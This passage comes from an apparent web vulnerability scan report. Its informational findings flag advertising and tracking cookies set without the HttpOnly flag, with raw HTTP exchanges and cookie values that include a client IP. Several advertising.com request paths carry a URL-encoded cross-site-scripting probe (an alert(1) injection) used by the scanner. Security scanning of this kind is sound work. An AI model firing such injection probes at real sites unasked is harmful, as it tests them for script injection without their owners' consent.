E!#Q,.!!!!#<pjWF!#Q@W!!!!$<rsC*!#QpI!!!!3<qd67!#QpJ!!!!3<qd67!#QpL!!!!3<qd67!#QpS!!!!3<qd67!#QpU!!!!3<qd67!#RU?!!!!6<qd67!#RUA!!!!6<qd67!#Ri/!!!!)<pjWE!#Rij!!!!)<pjWE!#SCj!!!!%<pjWC!#Sq>!!!!#<nrb9!#T-b!!!!6<qd67!#TnE!!!!6<qd67!#Twl!!!!#<nZs,!#Tws!!!!#<nZjk!#U@t!!!!1<qd67!#U@x!!!!1<qd67!#UA$!!!!1<qd68!#UDQ!!!!*<q*ty!#UF1!!!!$<s#._!#VDX!!!!#<q4hD!#VRb!!!!#<nAv7!#X.$!!!!$<rsC*!#XI9!!!!#<q)LA!#YOT!!!!$<qOId!#YQK!!!!#<oDg)!#YQL!!!!#<pjT*!#]#G!!!!#<pqev!#]Ub!!!!4<qd68!#]Uc!!!!4<qd68!#]Ud!!!!4<qd67!#]Ue!!!!4<qd67!#]Uf!!!!4<qd67!#]Ug!!!!4<qd68!#]Uh!!!!4<qd68!#]Ui!!!!4<qd67!#]Uj!!!!4<qd68!#]Uk!!!!4<qd67!#]Ul!!!!4<qd67!#]Um!!!!4<qd67!#]Un!!!!4<qd67!#]Uo!!!!4<qd67!#]Up!!!!4<qd68!#]Us!!!!4<qd68!#]Uy!!!!4<qd68!#]Z!!!!!.<pN)4!#]Z$!!!!*<pN)4!#]w8!!!!'<q*ty!#]w<!!!!'<q*ty!#]wX!!!!%<pv/h!#]w[!!!!'<q*ty!#]wf!!!!'<q*ty!#]wp!!!!'<q*ty!#^c@!!!!*<q*ty!#^cm!!!!*<q*ty!#^f#!!!!2<qd67!#a3k!!!!)<pjWE!#a=#!!!!#<o`%d!#aG>!!!!)<pjWE!#aH+!!!!#<r)hx!#aK:!!!!#<p%Ky!#avQ!!!!#<rsC3!#b<Z!!!!#<piFJ!#b<_!!!!#<pjTD!#b<`!!!!#<pjT1!#b<a!!!!#<pjT1!#b<j!!!!#<pjT1!#b<k!!!!#<piFJ!#b<m!!!!#<nrVk!#b='!!!!#<pjT1!#b=*!!!!#<piFJ!#b=E!!!!#<piFJ!#b=F!!!!#<pjT1!#b=J!!!!#<nrVk!#be'!!!!#<nAv>!#dCX!!!!#<s!iX!#eQ0!!!!#<qbhM!#eQ3!!!!#<qbhM!#eSE!!!!#<tI,]!#e_K!!!!%<q*ty!#ev4!!!!#<rgM%!#f-v!!!!%<ro^u!#f.)!!!!$<ro^u!#f.+!!!!$<ro^u!#f__!!!!#<pd^@!#ffc!!!!#<s0w$!#fle!!!!#<s#7!!#g)H!!!!*<q*ty!#g)I!!!!*<q*ty!#g)L!!!!$<p%L'!#g)M!!!!#<o,,D!#g)N!!!!$<pN'h!#g)O!!!!*<q*ty!#g)P!!!!*<q*ty!#g)Q!!!!*<q*ty!#g)R!!!!*<q*ty!#g)S!!!!*<q*ty!#g)T!!!!*<q*ty!#g)U!!!!*<q*ty!#g)V!!!!*<q*ty!#g)W!!!!*<q*ty!#g)X!!!!*<q*ty!#g)Y!!!!*<q*ty!#g)Z!!!!*<q*ty!#g)[!!!!*<q*ty!#g)]!!!!*<q*ty!#g)^!!!!*<q*ty!#g]5!!!!'<qUl5!#g_f!!!!#<o,,D!#gaO!!!!$<p%L'!#gaP!!!!*<q*ty!#gb5!!!!4<qd67!#h.N!!!!#<oDg4!#j9h!!!!#<n9!g!#jRo~~!#jS<~~!#l#]!!!!#<pd+P!#nEj!!!!4<qd67!#n`.!!!!#<qX-f!#n`5!!!!$<s2Fd!#pRK!!!!#<rsNk!#p]R!!!!#<p2A7!#p]T!!!!#<p2A7!#q+A!!!!4<qd67!#qF%!!!!*<q*ty!#qF'!!!!*<q*ty!#qUW!!!!4<qd67!#quh!!!!$<s2Fe!#r:6!!!!#<p]dk!#r=i!!!!#<nZs2!#rVT!!!!4<qd67!#sXy!!!!%<qNu<!#so_!!!!#<p]be!#t:@!!!!'<qPUB!#tM)!!!!)<q*ty!#thg!!!!#<pjT1!#uJH!!!!#<pd^1!#uJJ!!!!#<pd^1!#usu!!!!)<pjWE!#v9_!!!!#<nB!e!#w!@!!!!4<qd67!#w!A!!!!4<qd67!#w!B!!!!4<qd67!#w!C!!!!4<qd67!#w!D!!!!4<qd67!#w!F!!!!4<qd68!#w!G!!!!4<qd67!#w!I!!!!4<qd67!#wW9!!!!)<pjWE!#wkr!!!!#<p2A7!#wnK!!!!)<pjWE!#wnM!!!!)<pjWE!#x>u!!!!#<r:uS!#xI*!!!!)<pjWE!#xUM!!!!.<qd67!$#2]!!!!#<r:uS"; path=/; expires=Sun, 31-Mar-2013 18:10:38 GMT
Set-Cookie: BX=6l13v316lnh2l&b=4&s=8i&t=47; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Fri, 01 Apr 2011 18:10:38 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

7.106. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 31-Mar-2013 18:17:20 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.107. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=6d0f24-24.143.206.42-1297806131; expires=Sun, 31-Mar-2013 18:11:07 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.108. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

V=GlchrMbA1MSR; Domain=.contextweb.com; Expires=Mon, 26-Mar-2012 18:11:06 GMT; Path=/
cwbh1=357%3B05%2F01%2F2011%3BEMON1%0A1931%3B04%2F16%2F2011%3BFE479%3B04%2F06%2F2011%3BFE311%3B04%2F02%2F2011%3BFE655%0A996%3B04%2F05%2F2011%3BFACO1%0A2452%3B04%2F21%2F2011%3BTMHS1%0A749%3B04%2F12%2F2011%3BDOTM3%0A2866%3B04%2F04%2F2011%3BSHME2%0A2863%3B04%2F20%2F2011%3BITUT5%0A541%3B04%2F23%2F2011%3BLIFL1%0A398%3B03%2F27%2F2012%3BBK078; Domain=.contextweb.com; Expires=Sat, 05-Mar-2016 18:11:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.109. http://cf.addthis.com/red/p.json previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cf.addthis.com
Path:	/red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1301343580.1FE|1301343580.60|1300446510.66|1299801259.19A; Domain=.addthis.com; Expires=Sun, 31-Mar-2013 16:55:41 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.110. http://leadback.advertising.com/adcedge/lb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://leadback.advertising.com
Path:	/adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=sahlNZK9CYVVGwgAaVlBMIpwHg02FS1BdbdhUdgohXIVHgZ4FS1BkFehUdgihXIVHgimGS1BZGehUdw7NYIVHMa4FS1BAGehUdAmoZIVH8fFGS1BmMqhUdA3WaIVH0NYGS1BSGehUdwnhXIVHERoGS1BC9qhUdAadaIVHQYrGSlrrUgj/ZoowmrBMKpRCgpDBwU+FXXAHZfR3DbJBcYjGEipIIQ6/YEVwuLATKpRS3adHoXdGrprMFwPAaUewKPAqNpRv3qfe0xqGK/sdXgWqacrs64AK+mxm7a+DM5iGKPpuUgG2YwAj5QiGszsmZwoka0Lm+XB9LlhVJ74FYooGtqsjVADga0qCKSB9mUxtGZAGAazFciZmjoxnGKvGcuKG9Sj0jw+NX8bee6BFchhFRL7IcvrGAH; domain=advertising.com; expires=Sun, 31-Mar-2013 18:17:16 GMT; path=/
GUID=MTMwMTY4MTgzNjsxOjE2bHNxaWkxbjFhM2NyOjM2NQ; domain=advertising.com; expires=Sun, 31-Mar-2013 18:17:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.111. http://mm.chitika.net/minimall previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mm.chitika.net
Path:	/minimall

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_cc=G/T85rQZ4xB59n/xoVC1JkJnFZ3WKRMTuBC4cSX5YmAoooBX0xlgIjivgKSM7lCIveiE9Kh2qvZEgqOjUTih1KmjUcZyhOEEpHvMhY6fkipvIZH8CblbNg57UbvvXx1Xcjmrc3C+JsLBAFWBNuaK71yEcP/9Ua8dJ4uskOwT+5xYWjIjezi4gAbbY4lAUGwtk/yoRjTE7EnyLIZRQe9b8vjnBNDGqEg1G2TOtwhvrpmnk5pJXYnZb859kZqscwtmp9+1BSAZcJVIGXF9Tn2owMajYrtu86PD4BWooCZB3UWz/LbADCm9a9sVbEp7+mTl5kwKzb232TwR5Fi+QoskPSdQ2UlD/2P0oNOvUI8yoz++Hd9sJLVYHUSfYZHuGuQrSvwDwd51lOHN5PlGJBFmk+xiRQqFOP6u1n76Umpe3LCCcunTv80UGrV6BcH+jCN2Kg5Ll3vMRVc0E5GpDy/dpgZmHYoKFkyy/7i6BPUOkAbz1qr3T8skzTLv0xP844OoGMXsou+TlbMabFrbxLiLl2nLtUxX.lxwL5SC/LrnqWNmqK+PBPQ.4; path=/; domain=.mm.chitika.net; expires=Sat Mar 31 17:01:46 2012 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /minimall?type=pixel&client=mercantila&url=http%3A//www.mercantila.com/&cb=929 HTTP/1.1
Host: mm.chitika.net
Proxy-Connection: keep-alive
Referer: http://www.mercantila.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cc=G/T0JjQk4hB9jgs/945Ie6ysuV2X6f1GrfGOHdAxHI3zqTuXgjz7bM7/T1WXxPf8Ww6nIcY40W3r/PZAPRtqT4kEWbw27AHuu7eesHE0zKA98aOz5KQgDOyXOQEOrR91StiTdB8ye3tgvwWmA7yR/z0wtFIs+FywmBqNuO1WMIh2/gC0CNS0LxjfsL0ncrX3H/RgBUj2SM3Wwt2eS/YobQs1qaftZwdoO3IPSi4uEfA+Kc1RnP0f4CIAUbmHkLtjfb5gNyvA7d7Xze4pdet6bUimubU86DnNheoSj+jyJ8iwdv5h2qaJMzh/JVOH/Ob70imVVmDYFB45+s+gTFXJWIF3/MPZH3ES3j3nRA3/8irmZGOy3Osthbc0hR2zLlpkuh35hrZ7WK6eY1e8qjQLVi/XbZ3mjhVJafVyhCNcPbks+j2Kk/p3PPbVdBm2nlhX10+/CFJZ/QCyCmkFp9AY.aFDZ6AU8f2vxKc4s3TybKA.4

Response

HTTP/1.1 200 OK
Date: Fri, 01 Apr 2011 17:01:46 GMT
Server: Apache
P3P: policyref="http://scripts.chitika.net/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: _cc=; path=/; domain=.chitika.net; expires=Fri Apr 1 17:01:46 2011 GMT
Set-Cookie: _cc=G/T85rQZ4xB59n/xoVC1JkJnFZ3WKRMTuBC4cSX5YmAoooBX0xlgIjivgKSM7lCIveiE9Kh2qvZEgqOjUTih1KmjUcZyhOEEpHvMhY6fkipvIZH8CblbNg57UbvvXx1Xcjmrc3C+JsLBAFWBNuaK71yEcP/9Ua8dJ4uskOwT+5xYWjIjezi4gAbbY4lAUGwtk/yoRjTE7EnyLIZRQe9b8vjnBNDGqEg1G2TOtwhvrpmnk5pJXYnZb859kZqscwtmp9+1BSAZcJVIGXF9Tn2owMajYrtu86PD4BWooCZB3UWz/LbADCm9a9sVbEp7+mTl5kwKzb232TwR5Fi+QoskPSdQ2UlD/2P0oNOvUI8yoz++Hd9sJLVYHUSfYZHuGuQrSvwDwd51lOHN5PlGJBFmk+xiRQqFOP6u1n76Umpe3LCCcunTv80UGrV6BcH+jCN2Kg5Ll3vMRVc0E5GpDy/dpgZmHYoKFkyy/7i6BPUOkAbz1qr3T8skzTLv0xP844OoGMXsou+TlbMabFrbxLiLl2nLtUxX.lxwL5SC/LrnqWNmqK+PBPQ.4; path=/; domain=.mm.chitika.net; expires=Sat Mar 31 17:01:46 2012 GMT
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/plain

7.112. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

33x_ps=u%3D6637385404%3As1%3D1297862555444%3Ats%3D1301676954542%3As2.33%3D%2C7652%2C2751%2C4402%2C6571%2C7051%2C6561%2C4411%2C2741%2C5482%2C571%2C7673%2C6581%2C8292%2C7621%2C6531%2C8302%2C8171%2C2231%2C3321%2C4381%2C7101%2C5452%2C8181%2C4911%2C8312%2C5441%2C2812%2C5913%2C7591%2C3761%2C2802%2C3773%2C7111%2C5431%2C5903%2C7131%2C1051%2C3203%2C5421%2C4451%2C6651%2C7121%2C5411%2C6641%2C5891%2C2791%2C4941%2C581%2C4432%2C7562%2C8232%2C3741%2C5941%2C8111%2C7142%2C591%2C1061%2C4441%2C7161%2C6622%2C8243%2C4421%2C2762%2C5391%2C601%2C3241%2C8121%2C3721%2C5381%2C5922%2C6432%2C5021%2C3711%2C7531%2C6111%2C7521%2C6932%2C5601%2C6091%2C7543%2C6941%2C6461%2C5591%2C6131%2C8043%2C8431%2C5051%2C8423%2C6952%2C4501%2C6412%2C8061%2C6961%2C7512%2C6421%2C6122%2C5581%2C4481%2C3171%2C6971%2C2571%2C8331%2C6501%2C5082%2C6981%2C202%2C6511%2C5073%2C8321%2C2142%2C6991%2C7461%2C6041%2C7961%2C4581%2C7001%2C5063%2C6471%2C6071%2C7011%2C231%2C7972%2C2652%2C5111%2C6052%2C7993%2C7031%2C6481%2C6331%2C4071%2C3521%2C6323%2C2981%2C5221%2C7902%2C3542%2C7873%2C2462%2C3551%2C6791%2C7382%2C4101%2C6841%2C5731%2C2951%2C6291%2C7391%2C3561%2C5212%2C6281%2C4051%2C2491%2C7361%2C2971%2C3571%2C2481%2C3581%2C4671%2C2962%2C5751%2C341%2C7351%2C6393%2C4681%2C2501%2C7833%2C4692%2C7811%2C5181%2C6863%2C3071%2C7821%2C6372%2C4031%2C6851%2C3481%2C5172%2C7341%2C7861%2C3491%2C4711%2C5133%2C6362%2C7321%2C5123%2C3501%2C6901%2C4723%2C7842%2C7301%2C5151%2C3512%2C5141%2C7851%2C5683%2C361%2C5351%2C7293%2C7773%2C4271%2C2311%2C2851%2C5832%2C4742%2C6201%2C951%2C7281%2C6661%2C2871%2C4281%2C5361%2C6181%2C4753%2C6191%2C7751%2C7261%2C5862%2C5312%2C921%2C6171%2C4771%2C5321%2C3911%2C7251%2C6713%2C4251%2C5873%2C6691%2C431%2C4791%2C6702%2C6152%2C5881%2C421%2C7782%2C2842%2C7711%2C3882%2C3341%2C7701%2C4802%2C7222%2C5771%2C4351%2C5781%2C7693%2C6721%2C3353%2C2933%2C6241%2C4341%2C6733%2C451%2C2941%2C7683%2C3891%2C7192%2C6771%2C5252%2C3851%2C5792%2C5261%2C5803%2C3841%2C971%2C3871%2C5811%2C7181%2C6211%2C5271%2C3391%2C7721%2C2901%2C961%2C5821%2C3861%2C6761%2C4311%2C7172%2C; Domain=.33across.com; Expires=Sat, 31-Mar-2012 16:55:54 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.113. http://pixel.fetchback.com/serve/fb/pdc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.fetchback.com
Path:	/serve/fb/pdc

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cmp=1_1301677306_11259:0_10164:1266120_10638:1266120_10640:1266120_10641:1266120_1437:1266120_8900:1266159_9081:1374736_9085:1374736_8956:1374736_9083:1374759_9084:1374759_8956:1374759_20:2507582; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
uid=1_1301677306_1297862321306:0415785655118336; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
kwd=1_1301677306_11317:1266120_11717:1266120_11718:1266120_11719:1266120_11722:1374755_10827:1374755_10842:1374759_10839:1374759_10824:1374959; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
sit=1_1301677306_3047:0:0_2701:1266159:1266159_719:1266241:1266120_2707:1374959:1374736_3225:1656397:1656397_828:2178912:2178912_11:2582837:2507582_3314:2586575:2505491_3289:2587825:2582338_2002:3814985:3813764; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
cre=1_1301677306_20056:6436:8:683890_15292:30504:1:845883_19000:38838:1:845896_20053:24803:11:1035158_20054:24802:1:1035558_14598:11789:1:2308702; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
bpd=1_1301677306_h9i9:Aq3r; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
apd=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
scg=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
ppd=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/
afl=1_1301677306; Domain=.fetchback.com; Expires=Wed, 30-Mar-2016 17:01:46 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.114. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EAIAEc45slG6iR6aEAG4AQG0BoGyDBmtEM_B0T4eWUt6WrGTDhmxPHTfeWDHAAtw5w8ftYHRAg7Ck94ZIxAhCRAAQQKdLEltSlJBMlwk0lAyxqb8GSAbW27RhJehLTANqSDS45sdL5Hi1eIA; expires=Thu, 30-Jun-2011 18:10:37 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775632/size=300250/u=2/bnum=15423922/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BkRFW2EBAAAABAAAAMAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
ROLL=AfAid6Nga0dM2aDL/oJpfu+3b1ZWiJF!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:33 GMT; path=/
15423922=_4d961519,5531881864,775632^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775632/size=300250/u=2/bnum=75921501/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=3/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BYTFW2EBAAAABAAAAgAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
ROLL=AfAiW6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8B!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:02 GMT; path=/
75921501=_4d961536,0137232116,775632^960768^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775633/size=728090/u=2/bnum=34648487/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=TUhlNZK9CYVVGxgAaVlRMIpwHg02FT1BdbdxUdgohXMVHgZ4FT1BkFexUdgihXMVHgimGT1BZGexUdw7NYMVHMa4FT1BAGexUdAmoZMVH8fFGT1BmMqxUdA3WaMVH0NYGT1BSGexUdwnhXMVHERoGT1BC9qxUdAadaMVHQYrGTlrrUgj/ZsowmrBMKphCgpDBwU+FYXAHZfh3DbJBcYjGFipIIQ6/YIVwuLATKphS3adHoXdGsprMFwPAaYewKPAqNphv3qfe0xqGL/sdXgWqagrs64AK+mBn7a+DM5iGLPpuUgG2Y0Aj5QiGtzsmZwoka4Lm+XB9LlxVJ74FYooGuqsjVADga4qCKSB9mUBuGZAGAazFdiZmjoBoGKvGcuKG+Sj0jw+NXAcee6BFchxFB; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
F1=BMRFW2EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJmtNJeSKvs26+zh4vwLJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HOYQhVoqqFkNzXwm0jnLhLqlPZs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
ROLL=AfAif6Nga0dM2aD!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:27 GMT; path=/
34648487=_4d961513,5357117238,775633^894875^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775633/size=728090/u=2/bnum=81095569/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=B0SFW2EBAAAABAAAAYAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPcN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnZo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RuzRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
ROLL=AfAiY6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqF!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:53 GMT; path=/
81095569=_4d96152d,0804225804,775633^956561^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775634/size=160600/u=2/bnum=50393661/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmanhattan.ny1.com%252Fcontent%252Ftop_stories%252F

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BkTFW2EBAAAABAAAAkAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
BASE=gKQkhmhBfm6pxP7QyqdoGxQlbe4D2JSiK3beIXeW+zhNiD6KRzqBlEvPZlZ2ZV59SmPiE0fq66jd+saN2nzQbpMiku2HRKGBuTHZpLN6Bibf+CBjFPUN8w1t4YpIfQcBW64hlANijfzE+S7Y9CQV5EWCmrVl/UwAg4xuyLz2pDmNEmRuRJeIfrUYpkoHQp4JMnBo7V+CxYPm/bXFfJetNJeSKvs26+zh4vILJJ2IZfSHoco6RurRxO1yE5r2rDh660pKMqJe7HWYQhVoqqdkNzXwm0jnLhLqlPBs1jT005aL4js+Lazar6O!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
ROLL=AfAiX6Nga0dM2aDL/oJpfu+3b1ZWiJlFnus7ma5xiT4NQCbmI40fCqFXLKqhd9u7nEy5v8RyRUR5J/P!; domain=advertising.com; expires=Sun, 31-Mar-2013 18:11:05 GMT; path=/
50393661=_4d961539,7387041562,775634^973887^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=775634/size=160600/u=2/bnum=54361916/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=4/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.ny1.com%252Ffavicon.ico%253F80003%2527-alert%25281%2529-%252746fe3f653ad%253D1

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BsRFW2EBAAAABAAAAQAAgEA; domain=advertising.com; expires=Sun, 31-Mar-2013 18:10:35 GMT; path=/
